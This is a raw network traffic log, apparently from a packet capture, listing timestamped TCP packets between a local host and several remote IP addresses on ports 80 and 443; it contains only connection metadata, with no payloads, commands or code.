                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430327892 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430334091 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430352926 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430372000 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430382967 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430495977 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430505037 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430516005 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430527925 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430536985 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430541992 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430557966 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430558920 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430571079 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430588007 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430588961 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430598021 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430607080 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430608034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430618048 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430625916 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430640936 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430650949 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430660009 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430685997 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430706024 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430716991 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430727959 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430738926 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430743933 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430780888 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430789948 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430792093 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430802107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430819988 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430824995 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430866003 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430877924 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430888891 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430927992 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430954933 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430964947 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430982113 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.430991888 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431001902 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431001902 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431014061 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431025982 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431025982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431035995 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431054115 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431071043 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431076050 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431087017 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431097031 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431107998 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431118965 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431119919 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431133032 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431154013 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431164026 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431185961 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431195021 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431205034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431233883 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431255102 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431265116 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431274891 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431287050 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431301117 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431303978 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431317091 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431325912 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431338072 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431345940 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431349039 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431374073 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431375027 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431385040 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431395054 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431406021 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431415081 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431416988 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431447029 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431461096 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431476116 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431493044 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431529045 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431606054 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431617022 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431627035 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431643009 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431654930 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431664944 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431669950 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431679964 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431695938 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431704998 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431708097 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431718111 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431729078 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431740046 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431744099 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431751966 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431762934 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431771994 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431776047 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431785107 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431792021 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431794882 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431813002 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431823015 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431833029 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431833982 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431862116 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431874037 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431879997 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431885004 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431895018 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431909084 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431915998 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431919098 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431943893 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431967020 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431977987 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.431987047 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432007074 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432023048 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432029963 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432034016 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432061911 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432070971 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432074070 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432096958 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432133913 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432145119 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432157993 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432173967 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432185888 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432192087 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432229996 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432231903 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432239056 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432248116 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432265043 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432274103 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432280064 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432287931 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432291985 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432301044 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432322979 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432347059 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432377100 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432387114 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432396889 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432419062 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432430029 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432440042 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432449102 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432472944 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.432496071 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.463506937 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.464040041 CET63812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.464059114 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.464440107 CET63812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.464443922 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470161915 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470177889 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470189095 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470205069 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470218897 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470228910 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470240116 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470251083 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470249891 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470293999 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.470315933 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475301027 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475346088 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475356102 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475403070 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475406885 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475424051 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475435972 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475445986 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475447893 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475455999 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475467920 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475477934 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475481987 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475508928 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.475522995 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.601200104 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.601324081 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.601356030 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.601471901 CET63812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.601471901 CET63812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.627810955 CET63812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.627819061 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.627835035 CET63812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.627840042 CET4436381213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.644869089 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.686621904 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.694890976 CET63814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.694900036 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.697371006 CET63814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.697376013 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.701613903 CET63815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.701641083 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.701996088 CET63815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.702002048 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.707484007 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.707511902 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.707567930 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.707868099 CET63818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.707882881 CET4436381813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.727948904 CET8063813185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.728112936 CET6381380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.736443043 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.776665926 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.818290949 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.823205948 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.823286057 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.823331118 CET63814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.831433058 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.831465960 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.831511974 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.831518888 CET63815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.831549883 CET63815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.870404959 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.892147064 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.892163038 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.906392097 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.906418085 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.906419992 CET63815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.906419992 CET63815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.906436920 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.906445980 CET4436381513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.914479017 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.915460110 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.915482044 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.916060925 CET63817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.916074038 CET4436381713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.916227102 CET63814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.916238070 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.916248083 CET63814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.916251898 CET4436381413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.919351101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.919411898 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.920085907 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.921734095 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.921814919 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.921888113 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.923753977 CET63820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.923793077 CET4436382013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.924056053 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.924130917 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.924195051 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.924305916 CET63821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.924330950 CET4436382113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.924961090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.033529043 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.033659935 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.033726931 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.040050030 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.040050030 CET63816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.040081024 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.040096998 CET4436381613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.043289900 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.043344021 CET4436382213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.043416023 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.044744968 CET63822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:13.044773102 CET4436382213.107.246.45192.168.2.4
